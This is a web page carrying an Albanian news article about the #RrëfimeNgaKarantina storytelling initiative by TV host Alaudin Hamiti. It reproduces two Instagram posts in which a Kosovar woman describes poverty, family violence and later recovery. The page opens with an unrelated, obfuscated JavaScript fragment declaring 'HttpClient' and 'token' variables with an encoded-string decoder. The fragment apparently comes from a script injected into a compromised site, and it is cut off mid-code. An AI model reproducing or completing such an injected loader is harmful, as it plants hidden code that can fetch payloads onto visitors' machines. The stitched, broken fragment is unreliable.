;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

#RrëfimeNgaKarantina: Nisma e Dinit në këto ditë izolimi

By

Në këto ditë kur koha e lirë është me bollëk, të shumta kanë qenë nismat në rrjete sociale.

Sfidat kanë qenë ato që kanë dominuar këto ditë mirëpo një tjëtër iniciativë është nisur nga Alaudin Hamiti, producenti dhe moderatori i ‘NIN’.

Ai përmes rrjeteve sociale i ka bërë thirrje ndjekësve të tij të ndajnë histori në  kuadër të #rrëfimeNgaKarantina, inspiruar nga Humans of New York.

Me të paralajmëruar historitë, të shumta kanë qenë ato që janë nisur në drejtim të llogarisë së prezantuesit duke shkaktuar edhe reagime me të parën të postuar.

Nëse mendoni që historia juaj duhet të dëgjohet, një mesazh dhe bëheni pjesë të #rrëfimengakarantina.

View this post on Instagram

(1/2) "Jam një vajzë 29 vjeçare e lindur në një qytet të Kosovës një vajzë që asnjeherë nuk shijoj fëmijërinë, nuk shijoj flokët me kurdele, një vajzë që edhe një akullore nëse e kam blerë më është dashtur të fshihem e ta haj. Babi nuk jetonte në Kosovë, gjendja shëndetësore iu keqësu, e ne ishim shumë fëmijë unë si e madhja i ndihmoja nanës ti bëhem krahu i djathtë edhe ashtu bëra. Vëllau morri rrugën jo të mirë me shoqëri filloj të ushtronte dhunë te ne dhe u bë shumë i egër. Humba shpresat për krahun e familjes sepse babi nuk u kthy për shumë vjet, vllau devijoj, tjert kishin nevoj për ndihmën time, nuk arrija dot ti kontrolloj krejt gjërat se edhe vet isha në moshën ku doja te bëjë diçka për vete. Por jo, ishte e pamundur në atë varfëri që shumë herë s'kishim edhe çka me ngrënë, e vllaut nuk i interesojke të ndihmonte por ushtrojke dhunë fizike e psiqike mbi ne…" #rrefimeNgakarantina

A post shared by Alaudin Hamiti (@alaudinhamiti) on

View this post on Instagram

(2/2) "Pas një kohe gjeta punë dhe bëra gjithçka ti ofroj familjes ndihmë. U kthy babi, por prap iki dhe asnjë herë nuk e tregoj vetën si nje babë i kundesshëm. Unë vazhdoja punën deri një ditë edhe nga puna me largun. Mirëpo pas gjithë asaj errësire takova një djalë që jetonte jashtë Kosovës u dashurua në mua, pas një kohë më propozoj fejesë edhe pse e dinte jetën si e kisha. Sot jetoj me të kemi një fëmijë, kam punën jetën gjithçka që ma herët as që e kisha imagjinu e as ëndërru… Tani jemi krejt mirë, babi hala endet nëpër Evropë duke mos tregu sukses as për vete. Duroni sado e vështirë të jeta. Pas çdo vështirësie do të vijnë ditët tona." #rrefimeNgakarantina

A post shared by Alaudin Hamiti (@alaudinhamiti) on

Artikuj të ngjashëm